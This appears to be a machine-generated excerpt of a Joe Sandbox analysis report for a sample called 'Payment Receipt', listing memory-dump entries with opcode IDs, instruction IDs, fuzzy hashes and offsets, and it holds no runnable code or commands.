                                                                      • Instruction ID: 2abf677bcd1a391eb5dc614e2eb960afa778e2dbc454c7659d3b6fd3ae9271d9
                                                                      • Opcode Fuzzy Hash: d7aee059dac856a1e94cb09ff5a1de51c052589b6d4a2dfa419ef599e55f80b9
                                                                      • Instruction Fuzzy Hash: 5B119172240516FFD722DB99CD40F9A77A8FFD9B50F114069F2059B291DA70EA01C7A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 044b3de66a966e7965fb61d6969a06d60797f7610739e8878de7a76da51e6680
                                                                      • Instruction ID: 1ef587c04a649c3ad27194c2ac42c4ffe4581d1f3b8008aa02f0b4f91fdc5567
                                                                      • Opcode Fuzzy Hash: 044b3de66a966e7965fb61d6969a06d60797f7610739e8878de7a76da51e6680
                                                                      • Instruction Fuzzy Hash: 9A01F032214202EBC324DF6ADC88967BBE8FFD4660F114519ED5987280D7309912C7D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bf4ad412cb3a97d061f523879b65808ed866b3dce7cfb1a41a6f293b4e28513
                                                                      • Instruction ID: fbe85eab14a10a4a659da05ee6a22b93e62f02bed81f06423a7b94f5ff478cbf
                                                                      • Opcode Fuzzy Hash: 5bf4ad412cb3a97d061f523879b65808ed866b3dce7cfb1a41a6f293b4e28513
                                                                      • Instruction Fuzzy Hash: C8115B71A01219EBDB15EF68CC44EAE7BB9FB88340F004059F90197340DA34E911CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a86e6a3483f43970f3d9747b642af1fe3bb6cb8ff91dc184a8b1d3f3385b2cb6
                                                                      • Instruction ID: 94efa08d870f97ee6b730a89508c262f7d033dba1b18560ba41cc4f636258145
                                                                      • Opcode Fuzzy Hash: a86e6a3483f43970f3d9747b642af1fe3bb6cb8ff91dc184a8b1d3f3385b2cb6
                                                                      • Instruction Fuzzy Hash: 941179B1A083099FC700DF69D84599BBBE8FF98710F00495AF998DB390E630E900CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bc2d29c4e7b29f5ea7b4b110664ab735342ff8a21ea2db6952fd97926118e9ac
                                                                      • Instruction ID: 78631c1bab356d4811633474194a09d27dd2bece401a22687287932b4c128377
                                                                      • Opcode Fuzzy Hash: bc2d29c4e7b29f5ea7b4b110664ab735342ff8a21ea2db6952fd97926118e9ac
                                                                      • Instruction Fuzzy Hash: 9B1179B1A083099FC700DF69D84594FBBE8FF99750F00895AF958DB3A4E630E900CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                      • Instruction ID: 21a871ac7679f7432496d433d4966001218ecc8a0e50a9b19202eb3c82cbe235
                                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                      • Instruction Fuzzy Hash: 9E017C322009849FE322861DC988FAA7BE9FB84754F0D08A5FA05CF691D638DC40C622
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71a3c740179eb060690500bf87b391a894e6ab6bb911eb8bfe175bec27f2d7a1
                                                                      • Instruction ID: 938030d35028612e3d8d2d350ac4f7e4ddcbdb762f57b1580f2669855d05c577
                                                                      • Opcode Fuzzy Hash: 71a3c740179eb060690500bf87b391a894e6ab6bb911eb8bfe175bec27f2d7a1
                                                                      • Instruction Fuzzy Hash: 04018F31B04909DFDF14EB69DC549AE77EEFF82620B5944A9DA01EF680EE20DD01C792
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e91bbbfb8ccd3f521a20e84c6cb064e7b854c5da33630c9bf73e000c6233f85b
                                                                      • Instruction ID: 1f5d26da3f0c0a8080c631fd7e9e829b645cb1142da797a6dc89d63b8cb76b91
                                                                      • Opcode Fuzzy Hash: e91bbbfb8ccd3f521a20e84c6cb064e7b854c5da33630c9bf73e000c6233f85b
                                                                      • Instruction Fuzzy Hash: 7AF0A932641711B7C732DB56CD41F5BBAAAFFC4B90F154429A6059F640D630ED01D6B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                      • Instruction ID: add8df8e0d5d944f6f85c55b9d36e0d1767bb8e9d86abf46d9f5e8a3c23ece53
                                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                      • Instruction Fuzzy Hash: 6CF0C8B2600611AFD324CF4DDC40E57FBEAEBD1A80F048128E509DB220E631ED04CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ffc227a24a5abddf0739d9f43e68933dd29d0131cbc47e0025c696603eab8ff0
                                                                      • Instruction ID: 9a84d8e6ee64376b66924d7b9df955c17521f95b22f9724a3fafcb4f878e3a89
                                                                      • Opcode Fuzzy Hash: ffc227a24a5abddf0739d9f43e68933dd29d0131cbc47e0025c696603eab8ff0
                                                                      • Instruction Fuzzy Hash: 96012171E1060AEFDB04DFA9D95599EBBF8FF98714F10405AF904EB350D6749A01CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                      • Instruction ID: aabc7c101413cdbb9597dee93b3631389f48214f58db03ae1cfc1a9c5952312c
                                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                      • Instruction Fuzzy Hash: 4CF0F633204A639BDF3216998840B6FAAD9BFD5A64F1A0035E20D9F244CA648D0296D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 671f643b6e390533d19dbe4130aee775b9acab699518600e3e41866f2ab59cee
                                                                      • Instruction ID: efe1ada8a17c63e2f5f93132cba7e5b21aa8c0b45e19ffa4fb72a81381e734b5
                                                                      • Opcode Fuzzy Hash: 671f643b6e390533d19dbe4130aee775b9acab699518600e3e41866f2ab59cee
                                                                      • Instruction Fuzzy Hash: 35018471E0020AEFDB04DFA9D8459AEB7F8FF58300F10805AF914EB350D6749A01CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1f4ab8a97b22fce7c881cc3edb0ab2be0717390eb741a19ced5ebb24cb55e49f
                                                                      • Instruction ID: 17173640a01f5c9ad6df8c9ba74c74b23b83e81b4e4efa34f17e16d5b1efb7d9
                                                                      • Opcode Fuzzy Hash: 1f4ab8a97b22fce7c881cc3edb0ab2be0717390eb741a19ced5ebb24cb55e49f
                                                                      • Instruction Fuzzy Hash: 64012171E0020AEFDB04DFA9D84599EBBF8FF58714F50405AE914EB350D6749A01CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                      • Instruction ID: 154156ba5cf307fa2f1be1907db8de61a413231b75c1e5e7532f39dd3a6701df
                                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                      • Instruction Fuzzy Hash: 6001AD326416859BD332961DCD05B99BB98FF81750F0D44A9FA049F6A1DBB8C800C312
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7dbbc5b6442233b5cbb9b9c6f5c7b1f36def7b869c24c8e7a934bfa6bc96057c
                                                                      • Instruction ID: 3d15a71f29cb73b3f8da0dfcd0aae23d4638a1cd64214cd2ccdf071139fbb0c9
                                                                      • Opcode Fuzzy Hash: 7dbbc5b6442233b5cbb9b9c6f5c7b1f36def7b869c24c8e7a934bfa6bc96057c
                                                                      • Instruction Fuzzy Hash: 68012C71A0064AABDB04DFA9D845AEEBBF8BF58710F14405AE505AB280D774AA01CB94
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                      • Instruction ID: b576f01f978516a871451e397e38b2e80216cdd4f5c35443263e8398ca0e11cd
                                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                      • Instruction Fuzzy Hash: 8DF0127210001EBFEF019F94DD80DEF7B7EFF55698B104165FA1196160D635DD21ABA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3edcc2cd2b41c9880029b2522c248d3b534366e7691f63d0737284f38d4dc0a3
                                                                      • Instruction ID: 84503588d4953e0c243ddc23725b5f4f120831135743efc4788cd53e91bedc5b
                                                                      • Opcode Fuzzy Hash: 3edcc2cd2b41c9880029b2522c248d3b534366e7691f63d0737284f38d4dc0a3
                                                                      • Instruction Fuzzy Hash: 6F018536100619ABCF129E84DC40EDA7F6AFB4C764F068205FE1966A20C736D971EF81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 514bc29c02697c3600db852cbaa52bbd6d5fa362abed3b0f8e2a111ad440953f
                                                                      • Instruction ID: 8c8ee5a63a68da382efe2ff3c0148d0e9ad216b7180d8a1b40509064b0223ffd
                                                                      • Opcode Fuzzy Hash: 514bc29c02697c3600db852cbaa52bbd6d5fa362abed3b0f8e2a111ad440953f
                                                                      • Instruction Fuzzy Hash: 40F059B27042425FFB109619AC06F3336DAF7C4750F65842AEB098F2C1FA70DC01839A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ecd861690e5327d5a23f6110e5083c8e08ef0c61dd91db9f25f13e99edcf59de
                                                                      • Instruction ID: abf48f106cf0a92c0278c7828f4df975491662e813621637fc5843ef0749f5f0
                                                                      • Opcode Fuzzy Hash: ecd861690e5327d5a23f6110e5083c8e08ef0c61dd91db9f25f13e99edcf59de
                                                                      • Instruction Fuzzy Hash: 3001A470600682DFE3329B2CCD48B6937E8BB40B40F880594FA02DF6DADB68D4428715
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Instruction ID: 45de6d1f75cb4a200f6252188b3be26ae342433235455887294b564e73a16b66
                                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                      • Instruction Fuzzy Hash: 31D012371E054DBBCB519FA6DC41F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 358b9887f143b7aa9af23945905a3f3c61212e097758d035e88777ba64098001
                                                                      • Instruction ID: bbeff8119dc9e53feac32dc251fbb17f9ac6e4cc59a404f624301bd4c4128ac6
                                                                      • Opcode Fuzzy Hash: 358b9887f143b7aa9af23945905a3f3c61212e097758d035e88777ba64098001
                                                                      • Instruction Fuzzy Hash: 27D0A730552102CBDF26CF8CCD10D6E36B8FF20640B44006CE70057524D364FC11C740
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                      • Instruction ID: 841c5033d08fa538e7438c1ed48efff6cbb26d30fb15f314d2f468ed78cce8d7
                                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                      • Instruction Fuzzy Hash: E7D0C935212E80CFD62BCB0CC9A4B5A73B4BB44B44F810490F501CBBA2D62CD944CA00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                      • Instruction ID: ccf773aaee35b82dc135d919dfc5d1bf9a855c600ed1934fafc284f1c488c9be
                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                      • Instruction Fuzzy Hash: ACC012322A0648AFC752AA99CD41F427BA9FBA8B40F000021F2048B670C631E820EA84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                      • Instruction ID: 4a50a51bdd3ab35f1d9cf96849b95ef5e5e92891abf196b452599efe26cfb64a
                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                      • Instruction Fuzzy Hash: 6ED01236100249EFCB01DF85C890D9A772AFBD8F10F109019FD190B6508A31ED63DA50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                      • Instruction ID: 8516e0ef21a31bb815dcc39fd2cca30af36bc7baba4d8da1b2345110353981ea
                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                      • Instruction Fuzzy Hash: E6C04879701A428FCF16DF2AD6D4F8977E4FB84780F160890E905DFB22E624E801CA10
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a01d78f79e5bb9643e21cfa62a4feb286cc97b856b9c5541d4b0664eb1f5b206
                                                                      • Instruction ID: d58513a0ca291f395633aa437d8cea2a056142e0857221d7d7388d6ff84fe879
                                                                      • Opcode Fuzzy Hash: a01d78f79e5bb9643e21cfa62a4feb286cc97b856b9c5541d4b0664eb1f5b206
                                                                      • Instruction Fuzzy Hash: 7A900231605800129540715848845464045F7E1311B59C415E1824954CCB54CA6A5361
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b9865e7a168abd0434784c21f321c54ea8329961a9571e091f2f16662e60d50
                                                                      • Instruction ID: 0b6a207645f8f9d11ca742a750b07fbd4d2de228218e3dad05f14060a6f8daaf
                                                                      • Opcode Fuzzy Hash: 8b9865e7a168abd0434784c21f321c54ea8329961a9571e091f2f16662e60d50
                                                                      • Instruction Fuzzy Hash: ED900261601500424540715848044066045F7E2311399C519A1954960CC758C9699369
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49d0824c6c34bbf2d384dc927bc0f47875b1b7fbc30fefd7c1afaaad60c124d5
                                                                      • Instruction ID: c044945311c9e70a8ec7e7972c3ae08a7142e8f6a4ba88eb482f6e82d02e5fca
                                                                      • Opcode Fuzzy Hash: 49d0824c6c34bbf2d384dc927bc0f47875b1b7fbc30fefd7c1afaaad60c124d5
                                                                      • Instruction Fuzzy Hash: DB90023120140802D5807158440464A0045E7D2311F99C419A1425A54DCB55CB6D77A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 88798e5ec5b51882c9f9a70f6d7b956685470960b9249be603b81ced63fcf6f5
                                                                      • Instruction ID: debb971c7c879b467167c0ac6ff2ec713f34cc232839c15aeda100315fe52be6
                                                                      • Opcode Fuzzy Hash: 88798e5ec5b51882c9f9a70f6d7b956685470960b9249be603b81ced63fcf6f5
                                                                      • Instruction Fuzzy Hash: 0D90023120544842D54071584404A460055E7D1315F59C415A1464A94DD765CE69B761
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f561f297c0d62e335bfa0445fe81aa1f7eea5ff818e17e8153ba2746ea8321d
                                                                      • Instruction ID: 5c41ead594921ec8ee1e66c1fa2aa9d020ebbde83de2d06462f5331aae3623ae
                                                                      • Opcode Fuzzy Hash: 9f561f297c0d62e335bfa0445fe81aa1f7eea5ff818e17e8153ba2746ea8321d
                                                                      • Instruction Fuzzy Hash: 6790023120140802D504715848046860045E7D1311F59C415A7424A55ED7A5C9A57231
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a50ca8d515f6226e0b799047274c373dbb8ab7b9c0e0fff5684f1a94a847e6f3
                                                                      • Instruction ID: bd1ca904743929f32ae4f581f2e5032fc7693bb0d879b31e0e7b9843d2330574
                                                                      • Opcode Fuzzy Hash: a50ca8d515f6226e0b799047274c373dbb8ab7b9c0e0fff5684f1a94a847e6f3
                                                                      • Instruction Fuzzy Hash: AF90023160540802D550715844147460045E7D1311F59C415A1424A54DC795CB6977A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af639566ed5ee3594d1ca8ba4fc939ccdb9caf138992645d99642f6accbe2045
                                                                      • Instruction ID: 5fe5ed90c7d822e32005a4f01dff6ab530e006fa2ab38025615d0bd398b5d937
                                                                      • Opcode Fuzzy Hash: af639566ed5ee3594d1ca8ba4fc939ccdb9caf138992645d99642f6accbe2045
                                                                      • Instruction Fuzzy Hash: 77900225211400030505B55807045070086E7D6361359C425F2415950CD761C9755221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c478525b07cbf437296385a9a03ca72110a865f523e49cc98d561ab024dff1c
                                                                      • Instruction ID: dfa289596148c72172eeb2e4fa07ff662a48d986c3543c8c2d1e013a9f9d3c72
                                                                      • Opcode Fuzzy Hash: 1c478525b07cbf437296385a9a03ca72110a865f523e49cc98d561ab024dff1c
                                                                      • Instruction Fuzzy Hash: DE900225221400020545B558060450B0485F7D7361399C419F2816990CC761C9795321
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: acfc12ad81d81229b1b6f92d0f336eb6cfd1308c4310275d81b4921e87cf54c9
                                                                      • Instruction ID: dd58f21ec59b52031ce87f5913dc17aad6f4156e0f3a5d5b583d08ba80b3dd7d
                                                                      • Opcode Fuzzy Hash: acfc12ad81d81229b1b6f92d0f336eb6cfd1308c4310275d81b4921e87cf54c9
                                                                      • Instruction Fuzzy Hash: D29002A1201540924900B2588404B0A4545E7E1211B59C41AE2454960CC665C9659235
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
